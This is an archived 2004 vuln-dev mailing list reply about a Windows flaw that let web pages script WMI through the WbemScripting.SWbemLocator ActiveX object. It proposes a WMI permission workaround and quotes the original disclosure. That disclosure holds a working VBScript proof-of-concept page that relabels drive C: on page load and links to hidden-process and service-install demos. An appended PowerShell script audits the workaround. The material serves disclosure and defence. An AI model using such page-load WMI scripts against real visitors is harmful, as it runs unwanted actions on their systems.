Vulnerability Development: [SPAM] RE: WbemScripting.SWbemLocator - createobject allows... EVERYTHING!

From: jasonk <jasonk_at_bluedevel.com>
Date: Fri, 5 Mar 2004 10:05:23 +1100

Hi Bartosz,

If you run as an administrator, and allow unrestricted ActiveX access, this
is no different to any other exploit. If the ActiveX was a trojan and you
allowed full scripted access, there is the same effect.

However I imagine this can be used with some crossing the boundaries to My
Computer, and then an attack effected much more easily than a "known file
location" vuln.

For a temporary fix, under XP:

Open Computer Management, Services and Applications-> right click WMI
Control, choose Properties.

Then, Deny "provider write" and "execute methods" for the cimv2 namespace.
This quite possibly WILL affect other applications on the computer, but
should prevent this from occurring.

Otherwise, I don't know enough about WMI to be able to say how to disable
certain applications. Anyone help?

jasonk
> -----Original Message-----
> From: Bartosz Kwitkowski [mailto:bartosz_at_wb.pl]
> Sent: Friday, 5 March 2004 8:24 AM
> To: vuln-dev_at_securityfocus.com
> Subject: WbemScripting.SWbemLocator - createobject allows...
> EVERYTHING!
>
> I would like to dedicate this discovery to Justyna.
>
> WbemScripting.SWbemLocator - this object has access to WMI in
> Win XP (I have Prof, fully patched), 2003, any NT? I
> think this vuln concerns all Windows where we can find
> WbemScripting.SWbemLocator.
>
> I would not like to publish more exploits because of their
> dangerous use.
>
> More examples are at:
>
> http://wb.pl/bartosz/wbem/process.htm - create process in
> hidden window
>
> http://wb.pl/bartosz/wbem/installservice.htm - installs service
>
> http://wb.pl/bartosz/wbem/changevolume.htm - changes volume of C:
>
> HOME PAGE - http://wb.pl/bartosz/
>
> example source:
>
> <HTML>
> <HEAD>
> <TITLE>Change volume of disk</TITLE>
> <SCRIPT LANGUAGE="VBScript">
>
> ' I would like to dedicate this discovery to Justyna.
>
> Sub window_onload
>   ' 3 = wbemImpersonationLevelImpersonate
>   Const impersonation = 3
>
>   ' Connect to the local WMI service (default namespace)
>   Set Locator = CreateObject("WbemScripting.SWbemLocator")
>   Set Service = Locator.ConnectServer()
>   Service.Security_.ImpersonationLevel = impersonation
>
>   ' Fetch the Win32_LogicalDisk instance for C: and set its volume label
>   Set Process = Service.Get("Win32_LogicalDisk=""C:""")
>   Process.VolumeName = "bartosz kwitkowski"
>   Process.Put_
> End Sub
>
> </SCRIPT>
> </HEAD>
> <BODY>
> I would like to dedicate this discovery to Justyna.
> </BODY>
> </HTML>
>
> ANY QUESTIONS? ASK ME!
>

Received on Mar 05 2004
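
Added example, not part of the original thread: a PowerShell check of the temporary fix described in the reply, reporting per trustee whether "Execute Methods" and "Provider Write" remain allowed by a root\cimv2 DACL. The function name `Get-WmiRightsReport` and the sample ACEs are constructed for illustration; the report matches ACEs by trustee name only and does not resolve group membership.

```powershell
# WMI namespace access-mask bits for the two rights named in the reply.
$Rights = [ordered]@{
    'Execute Methods' = 0x02   # WBEM_METHOD_EXECUTE
    'Provider Write'  = 0x10   # WBEM_WRITE_PROVIDER
}

# Hypothetical helper: folds a namespace DACL into allow/deny masks per trustee.
function Get-WmiRightsReport {
    param([Parameter(Mandatory)] [object[]] $Dacl)
    $byTrustee = @{}
    foreach ($ace in $Dacl) {
        $who = '{0}\{1}' -f $ace.Trustee.Domain, $ace.Trustee.Name
        if (-not $byTrustee.ContainsKey($who)) {
            $byTrustee[$who] = @{ Allow = [int64]0; Deny = [int64]0 }
        }
        $mask = [int64]$ace.AccessMask
        switch ($ace.AceType) {   # 0 = access allowed, 1 = access denied
            0 { $byTrustee[$who].Allow = $byTrustee[$who].Allow -bor $mask }
            1 { $byTrustee[$who].Deny  = $byTrustee[$who].Deny  -bor $mask }
        }
    }
    foreach ($who in ($byTrustee.Keys | Sort-Object)) {
        # A deny ACE overrides an allow ACE for the same trustee.
        $effective = $byTrustee[$who].Allow -band (-bnot $byTrustee[$who].Deny)
        foreach ($name in $Rights.Keys) {
            [pscustomobject]@{
                Trustee = $who
                Right   = $name
                Allowed = [bool]($effective -band $Rights[$name])
            }
        }
    }
}

# Constructed sample DACL (not read from a real host): Authenticated Users
# hold an allow ACE plus the deny ACE from the fix; Administrators are untouched.
$users  = [pscustomobject]@{ Domain = 'NT AUTHORITY'; Name = 'Authenticated Users' }
$admins = [pscustomobject]@{ Domain = 'BUILTIN'; Name = 'Administrators' }
$sample = @(
    [pscustomobject]@{ AceType = 0; AccessMask = 0x13;    Trustee = $users }
    [pscustomobject]@{ AceType = 1; AccessMask = 0x12;    Trustee = $users }
    [pscustomobject]@{ AceType = 0; AccessMask = 0x6003F; Trustee = $admins }
)
Get-WmiRightsReport -Dacl $sample | Format-Table -AutoSize

# Live DACL (assumes Windows Vista or later, where this method exists):
# $sd = Invoke-WmiMethod -Namespace 'root\cimv2' -Path '__SystemSecurity=@' -Name GetSecurityDescriptor
# Get-WmiRightsReport -Dacl $sd.Descriptor.DACL
```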